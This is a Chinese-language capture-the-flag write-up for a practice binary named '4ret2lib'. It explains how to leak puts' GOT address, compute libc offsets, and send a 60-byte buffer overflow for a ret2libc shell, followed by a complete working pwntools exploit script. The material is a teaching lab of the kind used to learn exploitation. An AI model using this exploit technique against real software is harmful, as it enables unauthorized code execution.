check一下,發(fā)現(xiàn)開了NX

image.png
拖進(jìn)ida,沒有system和binsh

image.png

image.png
可以看到第一個(gè)輸入,是輸入一個(gè)10進(jìn)制的地址,然后返回這個(gè)地址的內(nèi)容給你,這就很容易想到,利用這個(gè)功能去把puts函數(shù)的真實(shí)地址打印出來,將把got表中的內(nèi)容輸出,有了puts函數(shù)的真實(shí)地址,然后在求出libc中各個(gè)函數(shù)的地址,算一下偏移量,就很容易得到system函數(shù)的真實(shí)地址,然后求出“/bin/sh”的地址,這樣我們就可以拿到shell了

image.png
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./4ret2lib')
elf = ELF('./4ret2lib')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
puts_got = elf.got['puts']
print str(puts_got)

image.png
腳本:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./4ret2lib')
elf = ELF('./4ret2lib')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
puts_got = elf.got['puts']
print str(puts_got)
p.sendline(str(puts_got))
p.recvuntil(": ")
puts_addr = int(p.recv(10),16)
puts_libc = libc.symbols['puts']
system_libc = libc.symbols['system']
binsh_libc = libc.search('/bin/sh').next()
offset = puts_addr - puts_libc
system_addr = offset + system_libc
binsh_addr = offset + binsh_libc
payload = "A" * 60
payload += p32(system_addr) + 'b'*4 + p32(binsh_addr)
p.sendline(payload)
p.interactive()